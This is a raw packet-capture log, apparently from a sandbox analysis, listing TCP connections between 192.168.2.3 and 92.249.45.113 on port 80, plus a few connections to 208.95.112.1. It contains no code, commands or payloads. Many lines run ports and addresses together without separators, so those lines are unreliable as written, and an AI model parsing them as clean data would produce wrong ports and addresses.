                                                                                                                                        Jan 23, 2023 21:25:53.169919968 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170125961 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170145988 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170253992 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170309067 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170452118 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170527935 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170566082 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170603037 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170717001 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170777082 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170779943 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170831919 CET4971680192.168.2.392.249.45.113
Jan 23, 2023 21:25:53.170895100 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.170969009 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.170980930 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.171060085 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171147108 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171158075 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.171241045 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171247959 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.171330929 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171411037 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171451092 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.171497107 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171581984 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.171655893 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.232938051 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.233104944 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.233323097 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301035881 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.301165104 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.301189899 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301475048 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.301538944 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301568031 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301647902 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.301760912 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301781893 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.301871061 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301889896 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.301985979 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302062035 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302089930 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302146912 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302229881 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302251101 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302386045 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302407980 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302454948 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302473068 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302495956 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302520990 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302593946 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302613020 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302705050 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302797079 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302830935 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.302891016 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302912951 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.302972078 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303004980 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303004980 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303083897 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.303169012 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303189993 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303272963 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.303349018 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303381920 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303457975 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.303534985 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303556919 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303725004 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.303807974 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.303894043 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.303981066 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304003000 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304109097 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.304191113 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304214954 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304282904 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.304363012 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304385900 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304553986 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.304647923 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304676056 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304784060 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.304800987 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.304857969 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304881096 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304881096 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.304889917 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.305031061 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.305053949 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.364058018 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.364085913 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.364308119 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.404721022 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.404838085 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.407936096 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.432154894 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.432229996 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.432296038 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.432320118 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.432394981 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.432435036 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.432462931 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.432517052 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:53.432600975 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.432856083 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433095932 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433242083 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433531046 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433557987 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433850050 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433876991 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.433998108 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434247017 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434315920 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434370041 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434571028 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434781075 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.434818029 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435045958 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435074091 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435154915 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435199976 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435434103 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435611963 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435628891 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435864925 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435929060 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.435962915 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436230898 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436336040 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436364889 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436655045 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436758995 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.436794996 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437021017 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437164068 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437527895 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437552929 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437572002 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437700033 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437768936 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.437982082 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438079119 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438123941 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438344955 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438405991 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438440084 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438671112 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438863039 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.438982010 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439198017 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439222097 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439284086 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439368963 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439404964 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439671993 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.439733028 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.495387077 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.495423079 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.495472908 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.538635015 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.563227892 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.563256025 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.563400984 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.563596010 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:53.563637018 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:54.040550947 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:54.145442009 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:55.929179907 CET  49710  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:55.961136103 CET  80     49710  208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:55.961246014 CET  49710  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:56.018418074 CET  49717  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:56.048764944 CET  80     49717  208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:56.048871040 CET  49717  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:56.050263882 CET  49717  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:56.080812931 CET  80     49717  208.95.112.1   192.168.2.3
Jan 23, 2023 21:25:56.145765066 CET  49717  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:57.387721062 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:57.387804985 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:58.564861059 CET  49717  80     192.168.2.3    208.95.112.1
Jan 23, 2023 21:25:59.052732944 CET  49716  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:59.137691021 CET  49718  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:59.183409929 CET  80     49716  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:59.270956039 CET  80     49718  92.249.45.113  192.168.2.3
Jan 23, 2023 21:25:59.271110058 CET  49718  80     192.168.2.3    92.249.45.113
Jan 23, 2023 21:25:59.271301031 CET  49718  80     192.168.2.3    92.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:59.404380083 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.408112049 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.536535978 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.522527933 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.668401003 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.697349072 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.699944019 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.700057030 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.799278975 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.799462080 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.805896997 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.936820984 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.986946106 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.101003885 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.231977940 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.266861916 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.364993095 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.381027937 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.553019047 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.612912893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.661928892 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.725219011 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.856223106 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.948374987 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.057018042 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.188324928 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.291939974 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.365072966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.396956921 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.528601885 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.575546980 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.661962986 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.678045034 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.808942080 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.855988979 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.896370888 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.959621906 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.090670109 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.140971899 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.193288088 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.256362915 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.387257099 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.430114985 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.474524021 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.537333012 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.668495893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.709048033 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.755804062 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.818567991 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.949310064 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.990093946 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.037095070 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.100217104 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.231101036 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.271626949 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.318346024 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.381253004 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.512105942 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.606432915 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.662164927 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.725090027 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.855942965 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.893277884 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.943470955 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.007277966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.179003000 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.224912882 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.288518906 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.458165884 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.506027937 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.623275995 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.794948101 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.795058966 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.849853992 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.903924942 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.035625935 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.130971909 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.177998066 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.278064966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.409079075 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.447007895 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.490474939 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.027549982 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.198916912 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.280329943 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.334249973 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.440654993 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.571595907 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.610276937 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.662420988 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.163378954 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.334822893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.390861034 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.443763971 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.546200037 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.677018881 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.717154980 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.821436882 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.952554941 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.988811016 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.053216934 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.100404978 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.272105932 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.339256048 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.444247007 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.575208902 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.613493919 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.725845098 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.898135900 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.905600071 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.959491014 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.007060051 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.138587952 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.273540020 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.318914890 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.386657953 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.518362045 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.557701111 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.600192070 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.663096905 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.834980965 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.837805033 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.881553888 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.944468975 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.096570015 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.206904888 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.256539106 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.319804907 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.450817108 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.550713062 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.600188017 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.663201094 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.814194918 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:13.849142075 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:13.902194977 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:17.876439095 CET804971992.249.45.113192.168.2.3
